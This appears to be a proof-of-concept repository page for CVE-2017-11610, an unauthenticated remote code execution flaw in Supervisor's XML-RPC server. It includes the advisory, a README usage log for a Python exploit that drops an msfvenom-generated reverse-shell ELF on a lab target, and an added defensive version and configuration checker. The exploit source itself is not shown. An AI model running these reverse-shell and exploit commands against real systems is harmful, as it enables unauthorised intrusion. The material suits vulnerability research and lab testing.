PoC details: bfcce2903eb258fc507744dc4414228b7d2203d5

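Related vulnerability
Title: Supervisor XML-RPC server security vulnerability (CVE-2017-11610)
Description: Supervisor is a process control system for monitoring and controlling processes on Unix-like systems. The XML-RPC server is one of its components. A security vulnerability exists in Supervisor's XML-RPC server. A remote attacker can exploit it with a crafted XML-RPC request to execute arbitrary commands. Affected versions: Supervisor before 3.0.1, 3.1.x before 3.1.4, 3.2.x before 3.2.4, and 3.3.x before 3.3.3.
Description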
Standalone Python ≥3.6 RCE Unauthenticated exploit for Supervisor 3.0a1 to 3.3.2
Introduction
# CVE-2017-11610 Unauthenticated Reverse Shell RCE for Supervisor 3.0a1 - 3.3.2
Standalone Python ≥3.6 Unauthenticated RCE exploit for Supervisor 3.0a1 to 3.3.2, rewritten from this [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb). Explanatory [post here](https://ivanitlearning.wordpress.com/2019/11/05/ruby-exploit-rewrite-supervisor-3-0a1-to-3-3-2-unauthenticated-rce/).

Tested with Python 3.7 on [this target](https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610) running Supervisor 3.3.2.

## Usage:
```
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] -payload PAYLOAD
                  [-rpcpath RPCPATH]

Generate the payload first, eg: 
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o dir/payload.elf

Required arguments:
  -rhost RHOST      Target host running Supervisor eg. 192.168.92.153
  -payload PAYLOAD  Path to the ELF payload. eg dir/payload.elf

Optional arguments:
  -rport RPORT      Target port running Supervisor. Default: 9001
  -rpcpath RPCPATH  Path to the XML-RPC endpoint on Supervisor. Default: '/RPC2' as in http://192.168.92.153:9001/RPC2

Call the exploit like this: 
 ./exploit.py -rhost 192.168.92.153 -rport 9001 -rpcpath /RPC2 -payload dir/payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o payload.elf
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -rhost 192.168.92.153 -payload payload.elf
Extracting version from web interface..
Vulnerable version found: 3.3.2
Sending XML-RPC payload via POST to 192.168.92.153:9001/RPC2
Successful remote code execution
```
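
A defender-side check for the affected ranges listed in the advisory above, as an added example that is not part of the original README or exploit: it classifies a Supervisor version string against those ranges and flags an `[inet_http_server]` section in `supervisord.conf` that listens beyond loopback or has no credentials. The sample configuration is constructed, and a listener with no host part is conservatively treated as exposed (an assumption of this example).

```python
import configparser
import re

# Fixed release per branch, from the affected-version list in the advisory above.
FIXED = {(3, 0): (3, 0, 1), (3, 1): (3, 1, 4), (3, 2): (3, 2, 4), (3, 3): (3, 3, 3)}
VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?((?:a|b|rc|\.?dev)\d*)?$", re.I)


def is_affected(version):
    """True if `version` falls in a range the advisory lists as affected."""
    m = VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised Supervisor version: {version!r}")
    release = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    prerelease = m.group(4) is not None       # e.g. the "a1" in 3.0a1
    if release[:2] < (3, 0):
        return True                           # everything before 3.0.1
    fixed = FIXED.get(release[:2])
    if fixed is None:
        return False                          # branch not in the advisory list
    # A pre-release of the fixed version still counts as "before" the fix.
    return release < fixed or (release == fixed and prerelease)


def http_listener_findings(conf_text):
    """Flag an [inet_http_server] that is non-loopback or has no credentials."""
    cp = configparser.ConfigParser(interpolation=None, inline_comment_prefixes=(";",))
    cp.read_string(conf_text)
    if not cp.has_section("inet_http_server"):
        return []
    sec = cp["inet_http_server"]
    host = sec.get("port", "").rpartition(":")[0]   # "" when no host is given
    findings = []
    if host not in ("127.0.0.1", "localhost"):
        findings.append("listener reachable beyond loopback")
    if not (sec.get("username") and sec.get("password")):
        findings.append("no username/password on XML-RPC interface")
    return findings


# Constructed sample input, not taken from any real host.
SAMPLE_CONF = """
[inet_http_server]
port = *:9001        ; all interfaces
"""

if __name__ == "__main__":
    for v in ("3.0a1", "3.3.2", "3.3.3", "3.1.4", "3.2.3"):
        print(v, "affected" if is_affected(v) else "fixed")
    print(http_listener_findings(SAMPLE_CONF))
```
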
File snapshot

```
[4.0K] /data/pocs/bfcce2903eb258fc507744dc4414228b7d2203d5
├── [5.2K] exploit.py
└── [1.9K] README.md

0 directories, 2 files
```